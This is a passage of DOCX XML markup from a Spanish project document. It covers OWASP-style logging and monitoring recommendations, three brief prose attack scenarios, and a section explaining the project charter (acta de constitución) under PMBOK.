              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Asegúrese que todas las transacciones de alto valor poseen una traza de auditoría con controles de integridad que permitan detectar su modificación o borrado, tales como una base de datos con permisos de inserción únicamente u similar. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Establezca una monitorización y alerta efectivos de tal manera que las actividades sospechosas sean detectadas y respondidas dentro de períodos de tiempo aceptables. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Establezca o adopte un plan de respuesta o recuperación de incidentes, tales como NIST 800-61 rev.2 o posterior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00D4368C">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4368C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>el software de un foro de código abierto es operado por un pequeño equipo que fue atacado utilizando una falla de seguridad. Los atacantes lograron eliminar el repositorio del código fuente interno que contenía la próxima versión, y todos los contenidos del foro. Aunque el código fuente pueda ser recuperado, la falta de monitorización, registro y alerta condujo a una brecha de seguridad peor.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00D4368C">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4368C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>un atacante escanea usuarios utilizando contraseñas por defecto, pudiendo tomar el control de todas las cuentas utilizando esos datos. Para todos los demás usuarios, este proceso deja solo un registro de fallo de inicio de sesión. Luego de algunos días, esto puede repetirse con una contraseña distinta.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00613D1A" w:rsidP="00613D1A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #3: </w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00613D1A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>De acuerdo a reportes, un importante minorista tiene un sandbox de análisis de malware interno para los archivos adjuntos de correos electrónicos. Este sandbox había detectado software potencialmente indeseable, pero nadie respondió a esta detección. Se habían estado generando advertencias por algún tiempo antes de que la brecha de seguridad fuera detectada por un banco externo, debido a transacciones fraudulentas de tarjetas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00912EEA"/>
    <w:p w:rsidR="00ED16E1" w:rsidRDefault="00ED16E1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED16E1" w:rsidRPr="00ED16E1" w:rsidRDefault="00ED16E1" w:rsidP="00ED16E1"/>
    <w:p w:rsidR="00A345FD" w:rsidRDefault="00A345FD" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00D31662"/>
    <w:p w:rsidR="006B43F6" w:rsidRPr="00890B46" w:rsidRDefault="006B43F6" w:rsidP="00130FBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1465"/>
        </w:tabs>
        <w:sectPr w:rsidR="006B43F6" w:rsidRPr="00890B46" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId94"/>
          <w:footerReference w:type="default" r:id="rId95"/>
          <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>
          <w:pgMar w:top="1701" w:right="1418" w:bottom="1701" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc514520851"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Arranque del proyecto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc514520852"/>
      <w:r w:rsidRPr="00977053">
        <w:t>Carta de inicio del proyecto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="009E5376" w:rsidRDefault="009E5376" w:rsidP="009E5376"/>
    <w:p w:rsidR="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="009E5376"/>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>El acta de constitución del proyecto es un documento en el que se define el alcance, los objetivos y los participantes del proyecto. Da una visión preliminar de los roles y responsabilidades, de los objetivos y de los principales interesados y define la autoridad del Project manager. Sirve como referencia de autoridad para el futuro del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Este documento incluye:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Propósito del proyecto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Descripción del proyecto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Alcance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Objetivos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Requerimientos del proyecto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Entregables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Costes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Recursos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Otra definición:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t>El acta de constitución de un proyecto es un documento que autoriza formalmente un proyecto o una fase, y que contiene los requisitos iniciales que satisfacen las necesidades y expectativas de los interesados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t>Desarrollar el acta de constitución de proyecto es uno de los procesos contemplados en la guía PMBOK de gestión de proyectos del PMI (Project Management Institute). Este proceso se enmarca dentro del grupo de procesos de integración, aquellos destinados a conformar los diferentes elementos de un proyecto y coordinar las actividades.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00000A"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="001857A3" w:rsidRDefault="006B7D3B" w:rsidP="001857A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001857A3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>¿Qué elementos definen un Acta de Constitución de Proyecto?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Debe tratarse de un documento formal, por escrito.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Su contenido debe estar debidamente consensuado: requiere aprobación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Define los objetivos de lo que se va a hacer: establece requisitos iniciales relacionados con las necesidades y expectativas de los interesados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>¿Por qué es útil un Acta de Constitución de Proyecto?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Permite consensuar determinados aspectos del proyecto con el cliente o con todos los interesados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Facilita la dinámica de firma. En una ocasión me encontré con un cliente reacio a firmar la documentación, por miedo a verse después comprometido o atado. El problema, por lo tanto, no estaba en el propio documento Acta de Constitución, sino en una cuestión de desconfianza. Detectarlo nada más comenzar el proyecto me permitió trabajar ese aspecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
